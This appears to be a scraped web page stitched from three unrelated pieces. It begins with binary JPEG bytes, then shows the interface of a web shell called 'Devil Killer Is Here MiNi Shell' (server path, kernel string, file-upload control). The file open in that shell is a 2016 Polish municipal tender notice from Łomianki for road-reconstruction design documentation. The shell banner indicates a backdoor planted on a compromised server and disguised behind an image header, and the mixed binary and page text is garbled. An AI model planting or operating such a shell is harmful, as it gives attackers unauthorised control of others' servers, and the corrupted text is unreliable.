JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160329/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160329/69864-N-2016.html

<p class="kh_header"><b>Łomianki: Wykonanie dokumentacji projektowo-kosztorysowej dla zadań:


Część 1 - Przebudowa ul. Konopnickiej - zad 2015/34,

Część 2 - Przebudowa ul. Długiej - zad 2013/03,

Część 3 - Kompleksowa przebudowa dróg gminnych w kwartałach ulic - VII kwartał
(ul. Wiślana- ul. Długa - ul. Graniczna - ul. Kampinoska) - zad 2016/06,

Część 4 - Kompleksowa przebudowa dróg gminnych w kwartałach ulic - VIII kwartał 
(ul. Wiklinowa - ul. Rolnicza - ul. Ogrodowa - ul. Warszawska) - zad 2016/12.</b><br>
<b>Numer ogłoszenia: 69864 - 2016; data zamieszczenia: 29.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łomianki , ul. Warszawska 115, 05-092 Łomianki, woj. mazowieckie, tel. 22 7686301, faks 22 7686302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lomianki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej dla zadań:


Część 1 - Przebudowa ul. Konopnickiej - zad 2015/34,

Część 2 - Przebudowa ul. Długiej - zad 2013/03,

Część 3 - Kompleksowa przebudowa dróg gminnych w kwartałach ulic - VII kwartał
(ul. Wiślana- ul. Długa - ul. Graniczna - ul. Kampinoska) - zad 2016/06,

Część 4 - Kompleksowa przebudowa dróg gminnych w kwartałach ulic - VIII kwartał 
(ul. Wiklinowa - ul. Rolnicza - ul. Ogrodowa - ul. Warszawska) - zad 2016/12..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	Opis przedmiotu zamówienia.

Przedmiotem zamówienia jest opracowanie  dokumentacji projektowo - kosztorysowej dla poniższych części postępowania:

3.1	Dla 1 części postępowania przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej  dla przebudowy ulicy  Konopnickiej w Łomiankach:

3.1.1	Zakres prac obejmuje:

Opracowanie dokumentacji projektowo - kosztorysowej dla zadania pn.: Przebudowa
ul. Konopnickiej w zakresie wyznaczenia ścieżki rowerowej  na odc. od ul. Kolejowej do szpitala
w Dz. Leśnym ok. 1 500 m.
3.1.2	W ramach opracowania należy: 
1.	wykonać projekt przebudowy ulicy w zakresie wykonania ścieżki rowerowej,
2.	zaprojektować lokalny system odwodnienia jezdni,
3.	w terminie jednego miesiąca od daty podpisania umowy przedstawić projekt koncepcyjny do akceptacji Zamawiającego,
4.	w terminie nie dłuższym niż 210 dni od dnia zawarcia umowy wykonać na podstawie zaakceptowanej przez Zamawiającego koncepcji dokumentację projektowo - kosztorysową zawierającą:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	badania geologiczne,
d)	projekt budowlany - 4 egz. wraz z wersją elektroniczną,
e)	projekt wykonawczy  - 3 egz. wraz z wersją elektroniczną,
f)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki,
g)	przygotowanie materiałów i uzyskanie uzgodnień niezbędnych do wystąpienia o zgodę na realizację inwestycji,  
h)	projekt stałej organizacji ruchu wraz z wymaganymi uzgodnieniami - 3egz,
i)	przedmiar robót - 2 egz. wraz z wersją elektroniczną,
j)	kosztorys inwestorski - 2 egz. wraz z wersją elektroniczną,
k)	specyfikację techniczną wykonania i odbioru robót - 2 egz. wraz z wersją elektroniczną,
l)	informację BIOZ - 4 egz,
m)	operat wodnoprawny wraz z uzyskaniem pozwolenia wodnoprawnego - 2 egz. wraz z wersją elektroniczną,
n)	uzgodnienia z odpowiednimi instytucjami.



3.2	Dla 2 części postępowania przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej dla przebudowy ulicy Długiej w Łomiankach:

3.2.1	Zakres prac obejmuje:

Opracowanie dokumentacji projektowo - kosztorysowej dla zadania pn.: Przebudowa ul. Długiej
w Łomiankach na odcinku od ul. Wąskiej do ul. Brukowej o długości ok. 600 mb. 

3.2.2	W ramach opracowania należy: 
1.	wykonać projekt przebudowy nawierzchni jezdni oraz budowy chodnika,
2.	zaprojektować odwodnienie pasa drogowego,
3.projektowaną jezdnię dowiązać do rzędnych istniejących bram wjazdowych i niwelety nawierzchni przyległych jezdni, 
3.	w terminie jednego miesiąca od daty podpisania umowy przedstawić projekt koncepcyjny do akceptacji Zamawiającego,
4.	w terminie nie dłuższym niż 210 dni od dnia zawarcia umowy wykonać na podstawie zaakceptowanej przez Zamawiającego koncepcji dokumentację projektowo - kosztorysową zawierającą:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	projekt podziału nieruchomości,
d)	badania geologiczne,
e)	projekt budowlano - wykonawczy - 5 egz. wraz z wersją elektroniczną,
f)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki,
g)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o decyzję zezwalającą  na realizację inwestycji drogowej w trybie spec ustawy. 
h)	projekt stałej organizacji ruchu wraz z wymaganymi uzgodnieniami,
i)	uzgodnienia tras i lokalizacji w ZUD,
j)	przedmiar robót - 2 egz. wraz z wersją elektroniczną,
k)	kosztorys inwestorski - 2 egz. wraz z wersją elektroniczną,
l)	specyfikację techniczną wykonania i odbioru robót - 2 egz. wraz z wersją elektroniczną,
m)	Informację BIOZ - 2 egz,
n)	operat wodnoprawny wraz z uzyskaniem pozwolenia wodnoprawnego - 2 egz. wraz z wersją elektroniczną,
o)	uzgodnienia z odpowiednimi instytucjami.

3.3	Dla 3 części postępowania przedmiotem zamówienia jest opracowanie dokumentacji projektowo dla przebudowy - kosztorysowej dla zadania pn.: Kompleksowa przebudowa dróg gminnych w kwartałach ulic - VII kwartał (ul. Wiślana- ul. Długa - ul. Graniczna
- ul. Kampinoska).

3.3.1	Opracowanie dotyczy ulic:
- ul. Graniczna (odc. od ul. Akacjowej do ul. Długiej) - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 500 m
- ul. Rataja M. wraz z sięgaczem - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 330 m
- ul. Sezamkowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 120m
- ul. Żywiczna (odc. od ul. Akacjowej do ul. Kampinoskiej) - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 500 m
- ul. Łyżwiarska - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 280 m
- ul. Narciarska - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 380 m
- ul. Sportowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 180 m
- ul. Świerkowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 180 m
- ul. Wesoła - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 260 m

Wykonanie chodników zależne będzie od szerokości pasów drogowych i proponowanych na etapie koncepcji rozwiązań geometrycznych.

Dokumentację należy wykonać dla każdej ulicy odrębnie.

3.3.2	Ponadto w ramach opracowania należy : 

1.	projektowaną jezdnię dowiązać do rzędnych istniejących bram wjazdowych i niwelety nawierzchni przyległych jezdni, 
2.	w terminie jednego miesiąca od daty podpisania umowy przedstawić projekt koncepcyjny do akceptacji Zamawiającego,
3.	w terminie nie dłuższym niż 210 dni od dnia zawarcia umowy wykonać na podstawie zaakceptowanej przez Zamawiającego koncepcji dokumentację projektowo - kosztorysową zawierającą:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	badania geologiczne,
d)	projekt budowlany - 4 egz. wraz z wersją elektroniczną,
e)	projekt wykonawczy  - 3 egz. wraz z wersją elektroniczną,
f)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki,
g)	przygotowanie materiałów i uzyskanie uzgodnień niezbędnych do wystąpienia o zgodę na realizację inwestycji,  
h)	projekt stałej organizacji ruchu wraz z wymaganymi uzgodnieniami - 3egz.
i)	przedmiar robót - 2 egz. wraz z wersją elektroniczną,
j)	kosztorys inwestorski - 2 egz. wraz z wersją elektroniczną,
k)	specyfikację techniczną wykonania i odbioru robót - 2 egz. wraz z wersją elektroniczną,
l)	informację BIOZ - 4 egz,
m)	operat wodnoprawny wraz z uzyskaniem pozwolenia wodnoprawnego - 2 egz. wraz z wersją elektroniczną,
n)	uzgodnienia z odpowiednimi instytucjami..


3.4	Dla 4 części postępowania przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej dla zadania pn.: Kompleksowa przebudowa dróg gminnych
w kwartałach ulic VIII kwartał (ul. Wiklinowa - ul. Rolnicza - ul. Ogrodowa
- ul. Warszawska).

3.4.1	Opracowanie dotyczy ulic:

- ul. Porzeczkowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 250 m
- ul. Truskawkowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 310m
- ul. Jarzębinowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
-  o długości ok. 600 m
- ul. Leszczynowa - przebudowa w zakresie wykonania nawierzchni jezdni wraz z chodnikiem / ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 450 m
- ul. Bukowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
-  o długości ok. 210 m
- ul. Wiązowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
-  o długości ok. 215 m
- ul. Klonowa - przebudowa w zakresie wykonania nawierzchni jezdni wraz z chodnikiem / ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 490 m
- ul. Podpułkownika Józefa Krzyczkowskiego - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 400 m.
- ul. Żołnierzy Narwiku - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 400 m. 
- ul. Cyprysowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 330 m
 
Wykonanie chodników zależne będzie od szerokości pasów drogowych i proponowanych na etapie koncepcji rozwiązań geometrycznych.

Dokumentację należy opracować dla każdej ulicy odrębnie.

3.4.2	Ponadto w ramach opracowania należy: 

1.	projektowaną jezdnię dowiązać do rzędnych istniejących bram wjazdowych i niwelety nawierzchni przyległych jezdni, 
2.	w terminie jednego miesiąca od daty podpisania umowy przedstawić projekt koncepcyjny do akceptacji Zamawiającego,
3.	w terminie nie dłuższym niż 210 dni od dnia zawarcia umowy wykonać na podstawie zaakceptowanej przez Zamawiającego koncepcji dokumentację projektowo - kosztorysową zawierającą:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	dokonać podziałów działek (ok. 10 szt.)  dla ul. Podpułkownika Józefa Krzyczkowskiego oraz ul. Żołnierzy Narwiku 
d)	badania geologiczne,
e)	projekt budowlany - 4 egz. wraz z wersją elektroniczną,
f)	projekt wykonawczy  - 3 egz. wraz z wersją elektroniczną,
g)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki,
h)	przygotowanie materiałów i uzyskanie uzgodnień niezbędnych do wystąpienia o zgodę na realizację inwestycji,  
i)	projekt stałej organizacji ruchu wraz z wymaganymi uzgodnieniami - 3egz.
j)	przedmiar robót - 2 egz. wraz z wersją elektroniczną,
k)	kosztorys inwestorski - 2 egz. wraz z wersją elektroniczną,
l)	specyfikację techniczną wykonania i odbioru robót - 2 egz. wraz z wersją elektroniczną,
m)	informację BIOZ - 4 egz,
n)	operat wodnoprawny wraz z uzyskaniem pozwolenia wodnoprawnego - 2 egz. wraz z wersją elektroniczną,
o)	uzgodnienia z odpowiednimi instytucjami..

3.5	Szczegółowy opis przedmiotu zamówienia, terminy oraz warunki realizacji i płatności zawarte są w załącznikach do SIWZ 7-8..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przedmiot zamówień uzupełniających polega na powtórzeniu tego samego rodzaju zamówień. Zakres jest zgodny z przedmiotem zamówienia podstawowego i stanowi do 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 210.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:

Dla części 1 - 3600,00 PLN (słownie: trzy tysiące sześćset złotych 00/100).

Dla części 2 - 2400,00 PLN (słownie:  dwa tysiące czterysta złotych 00/100).

Dla części 3 - 3500,00 PLN (słownie: trzy tysiące pięćset złotych 00/100).

Dla części 4 - 4800,00 PLN (słownie: cztery tysiące osiemset złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1ustawy Pzp - odpowiednio dla każdej części postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę; 

dla części 1 - wykonał należycie minimum dwie usługi polegające na wykonaniu dokumentacji projektowo-kosztorysowej przebudowy lub budowy drogi o wartości minimum 80 000,00 zł brutto każda, wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający  nie wymaga aby Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu w  zakresie  wiedzy i doświadczenia wykazał niewykonane lub wykonane nienależycie usługi. 

dla części 2 - wykonał należycie minimum dwie usługi polegające na wykonaniu dokumentacji projektowo-kosztorysowej przebudowy lub budowy drogi o wartości minimum 50 000,00 zł brutto każda, wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający  nie wymaga aby Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu w  zakresie  wiedzy i doświadczenia wykazał niewykonane lub wykonane nienależycie usługi. 

dla części 3 - wykonał należycie minimum dwie usługi polegające na wykonaniu dokumentacji projektowo-kosztorysowej przebudowy lub budowy drogi o wartości minimum 80 000,00 zł brutto każda, wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający  nie wymaga aby Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu w  zakresie  wiedzy i doświadczenia wykazał niewykonane lub wykonane nienależycie usługi. 
dla części 4 - wykonał należycie minimum dwie usługi polegające na wykonaniu dokumentacji projektowo-kosztorysowej przebudowy lub budowy drogi o wartości minimum 100 000,00 zł brutto każda, wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający  nie wymaga aby Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu w  zakresie  wiedzy i doświadczenia wykazał niewykonane lub wykonane nienależycie usługi. 


Zamawiający  nie wymaga aby Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu w  zakresie  wiedzy i doświadczenia wykazał niewykonane lub wykonane nienależycie usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1ustawy Pzp - odpowiednio dla każdej części postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę, że dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia: posiadającymi uprawnienia budowlane do projektowania bez ograniczeń dla poszczególnych branż i należących do Okręgowej Izby Inżynierów Budownictwa (lub równoważne do ww. wydawane na podstawie przepisów obowiązujących w innych państwach) ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Pzp - odpowiednio dla każdej części postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1ustawy Pzp - odpowiednio dla każdej części postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych usług, w którym Wykonawca wykaże minimum dwie usługi polegające na wykonaniu dokumentacji projektowo-kosztorysowej przebudowy lub budowy drogi o wartości minimum:

dla Części 1 - 80 000,00 zł brutto każda, 
dla Części 2 - 50 000,00 zł brutto każda, 
dla Części 3 - 80 000,00 zł brutto każda, 
dla Części 4 - 100 000,00 zł brutto każda, 

wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi były wykonane wraz z załączeniem dowodów potwierdzających, że usługi zostały wykonane należycie. Zamawiający  nie wymaga aby Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu w  zakresie  wiedzy i doświadczenia wykazał niewykonane lub wykonane nienależycie usługi.;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający żąda od Wykonawcy udowodnienia Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie  realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.

Zgodnie z art. 26 ust. 2e ustawy Pzp. podmiot, który zobowiązał się do  udostępnienia zasobów  zgodnie z art. 2b ustawy Pzp.  odpowiada solidarnie z Wykonawcą  za szkodę  Zamawiającego  powstałą wskutek  nieudostępnienia  tych zasobów, chyba, że  za nieudostępnienie zasobów nie ponosi winy.
Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.

